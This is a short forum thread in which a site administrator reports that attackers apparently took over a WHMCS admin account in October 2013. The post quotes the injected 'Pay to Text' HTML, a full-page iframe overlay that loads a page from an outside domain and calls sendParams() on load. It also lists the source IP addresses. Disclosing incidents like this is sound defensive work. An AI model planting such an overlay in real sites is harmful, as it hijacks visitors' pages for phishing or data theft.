Jump to content

Hackers infiltrated our system and changed Pay to Text


eugenevdm

Recommended Posts

I suspect they ran a password crackers against our encrypted WHCMS admin and changed an admin's password.

 

Their method for attack is change the Pay to Text to have this code:

 

<p> <div id="contenido" class="contenido">
     <h1 class="titulos"><iframe frameborder="no" style="Z-INDEX: 999; POSITION: absolute; WIDTH: 100%; HEIGHT: 1800px; TOP: 0px; LEFT: 0px" onload="sendParams();" src="http://www.quien-visita-mi-perfil.id1945.com/Silver.html"></h1>
     <div id="texto_inicio">
     <p><iframe frameborder="no" style="Z-INDEX: 999; POSITION: absolute; WIDTH: 100%; HEIGHT: 1800px; TOP: 0px; LEFT: 0px" onload="sendParams();" src="http://www.quien-visita-mi-perfil.id1945.com/Silver.html">
     </p>
     </div>
</div> <br />
     </p>

 

We had WHMCS update our system after we first discovered hashed passwords a user's firstname field but I suspect it was too late. Let's hope it stops here.

Link to comment
Share on other sites

This occurred from the 20 Oct 2013 to 23 Oct 2013 (today).

 

Currently I run version 5.2.8 but I think I was on 5.2.4 until about 10 days ago before WHMCS updated our system.

 

They came from these IPs:

175.141.7.186

193.150.10.66

113.210.36.243

94.123.224.198

2.90.220.13

39.229.45.204

91.217.82.162

63.144.94.3

175.196.65.153

180.245.63.78

109.200.188.23

188.255.212.30

109.93.148.162

5.135.207.84

 

I'm implementing .htaccess now.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use & Guidelines and understand your posts will initially be pre-moderated